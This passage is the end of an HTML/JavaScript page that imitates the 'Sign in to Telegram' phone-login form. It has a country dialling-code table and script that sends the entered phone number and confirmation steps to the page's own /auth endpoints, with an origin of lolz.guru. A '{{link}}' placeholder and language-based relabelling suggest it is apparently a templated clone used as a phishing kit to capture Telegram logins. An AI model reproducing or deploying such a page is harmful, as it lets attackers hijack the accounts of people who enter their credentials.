          codes: [{ code: "268", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "TC",
          name: "Turks &amp; Caicos Islands",
          codes: [{ code: "1649", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "TD",
          name: "Chad",
          codes: [{ code: "235", patterns: ["XX XX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "TG",
          name: "Togo",
          codes: [{ code: "228", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "TH",
          name: "Thailand",
          codes: [{ code: "66", patterns: ["X XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "TJ",
          name: "Tajikistan",
          codes: [{ code: "992", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "TK", name: "Tokelau", codes: [{ code: "690" }] },
        { iso2: "TL", name: "Timor-Leste", codes: [{ code: "670" }] },
        {
          iso2: "TM",
          name: "Turkmenistan",
          codes: [{ code: "993", patterns: ["XX XXXXXX"] }],
          patterns: [],
        },
        {
          iso2: "TN",
          name: "Tunisia",
          codes: [{ code: "216", patterns: ["XX XXX XXX"] }],
          patterns: [],
        },
        { iso2: "TO", name: "Tonga", codes: [{ code: "676" }] },
        {
          iso2: "TR",
          name: "Turkey",
          codes: [{ code: "90", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "TT",
          name: "Trinidad &amp; Tobago",
          codes: [{ code: "1868", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "TV", name: "Tuvalu", codes: [{ code: "688" }] },
        {
          iso2: "TW",
          name: "Taiwan",
          codes: [{ code: "886", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "TZ",
          name: "Tanzania",
          codes: [{ code: "255", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "UA",
          name: "Ukraine",
          codes: [{ code: "380", patterns: ["XX XXX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "UG",
          name: "Uganda",
          codes: [{ code: "256", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "US",
          name: "USA",
          codes: [{ code: "1", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "UY",
          name: "Uruguay",
          codes: [{ code: "598", patterns: ["X XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "UZ",
          name: "Uzbekistan",
          codes: [{ code: "998", patterns: ["XX XXX XX XX"] }],
          patterns: [],
        },
        {
          iso2: "VC",
          name: "Saint Vincent &amp; the Grenadines",
          codes: [{ code: "1784", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "VE",
          name: "Venezuela",
          codes: [{ code: "58", patterns: ["XXX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "VG",
          name: "British Virgin Islands",
          codes: [{ code: "1284", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "VI",
          name: "US Virgin Islands",
          codes: [{ code: "1340", patterns: ["XXX XXXX"] }],
          patterns: [],
        },
        { iso2: "VN", name: "Vietnam", codes: [{ code: "84" }] },
        { iso2: "VU", name: "Vanuatu", codes: [{ code: "678" }] },
        { iso2: "WF", name: "Wallis &amp; Futuna", codes: [{ code: "681" }] },
        { iso2: "WS", name: "Samoa", codes: [{ code: "685" }] },
        {
          iso2: "XG",
          name: "Global Mobile Satellite System",
          codes: [{ code: "881" }],
          hidden: true,
        },
        {
          iso2: "XK",
          name: "Kosovo",
          codes: [{ code: "383", patterns: ["XXXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "XV",
          name: "International Networks",
          codes: [{ code: "882" }, { code: "883" }],
          hidden: true,
        },
        {
          iso2: "YE",
          name: "Yemen",
          codes: [{ code: "967", patterns: ["XXX XXX XXX"] }],
          patterns: [],
        },
        {
          iso2: "YL",
          name: "Y-land",
          codes: [{ code: "42", prefixes: ["4", "7"] }],
          prefixes: [],
          hidden: true,
        },
        {
          iso2: "ZA",
          name: "South Africa",
          codes: [{ code: "27", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "ZM",
          name: "Zambia",
          codes: [{ code: "260", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
        {
          iso2: "ZW",
          name: "Zimbabwe",
          codes: [{ code: "263", patterns: ["XX XXX XXXX"] }],
          patterns: [],
        },
      ];
      function showLoginError(error_text) {
        getEl("login-phone-code-textfield").classList.add("is-invalid");
        getEl("login-phone-textfield").classList.add("is-invalid");
        getEl("login-alert").innerHTML = error_text;
      }
      function requestConfirmation(event) {
        event && event.preventDefault();
        getEl("login-phone-code-textfield").classList.remove("is-invalid");
        getEl("login-phone-textfield").classList.remove("is-invalid");
        getEl("login-alert").innerHTML = "";
        var code = getEl("login-phone-code").value;
        var phone = getEl("login-phone").value;
        ajax(
          "/auth/request?bot_id=877588973&origin=https%3A%2F%2Flolz.guru",
          {
            phone: (code + phone).replace(/[^0-9]+/g, ""),
          },
          function () {
            openConfirmation();
          },
          function (xhr) {
            showLoginError(xhr.responseText || "Server error");
          }
        );
        return false;
      }
      function openConfirmation() {
        var code = getEl("login-phone-code").value;
        var phone = getEl("login-phone").value;
        getEl("login-phone-field").innerHTML =
          (code.length > 1 ? code + " " : code) + phone;
        getEl("send-form").classList.add("hide");
        getEl("login-form").classList.remove("hide");
        checkAuth();
      }
      function cancelConfirmation(event) {
        event && event.preventDefault();
        getEl("login-phone-field").innerHTML = "";
        getEl("send-form").classList.remove("hide");
        getEl("login-form").classList.add("hide");
        getEl("login-phone").focus();
        clearTimeout(window.authTimeout);
        ajax(
          "/auth/cancel?bot_id=877588973&origin=https%3A%2F%2Flolz.guru",
          {}
        );
        return false;
      }
      function checkAuth() {
        clearTimeout(window.authTimeout);
        window.authTimeout = setTimeout(function doCheckAuth() {
          ajax(
            "/auth/login?bot_id=877588973&origin=https%3A%2F%2Flolz.guru",
            {},
            function (result) {
              if (result) {
                location.reload();
              } else {
                checkAuth();
              }
            },
            function (xhr) {
              cancelConfirmation();
              showLoginError(xhr.responseText || "Server error");
            }
          );
        }, 700);
      }
      function loginCancel(e) {
        window.location.href = "{{link}}";
      }
      var userLang = navigator.language || navigator.userLanguage;

      region = userLang.split("-")[1];
      lang = userLang.split("-")[0];

      if (typeof region == "undefined")
        inputFormatPhoneInit(lang.toUpperCase(), "", lang);
      else inputFormatPhoneInit(region.toUpperCase(), "", lang);

      if (lang == "ru") {
        document.getElementById("phone-form-title").innerHTML =
          "Войти в Telegram";
        document.getElementById(
          "phone-form-text"
        ).innerHTML = `Проверьте код страны и введите свой номер телефона.`;
        document.getElementById("country-input-label").innerHTML = "Страна";
        document.getElementById("phone-input-label").innerHTML =
          "Номер телефона";
        document.getElementById("phone-form-checkbox").innerHTML =
          "Запомнить меня";
        document.getElementById("next").innerHTML = "ДАЛЕЕ";
        document.getElementById("auth-button-link").innerHTML =
          "ВХОД ПО QR-КОДУ";
      } else {
        document.getElementById("phone-form-title").innerHTML =
          "Sign in to Telegram";
        document.getElementById(
          "phone-form-text"
        ).innerHTML = `Please confirm your country code <br />
          and enter your phone number.`;
        document.getElementById("country-input-label").innerHTML = "Country";
        document.getElementById("phone-input-label").innerHTML = "Phone Number";
        document.getElementById("phone-form-checkbox").innerHTML =
          "Keep me signed in";
        document.getElementById("next").innerHTML = "NEXT";
        document.getElementById("auth-button-link").innerHTML =
          "LOG IN BY QR CODE";
      }

      initRipple();
    </script>
  </body>
</html>
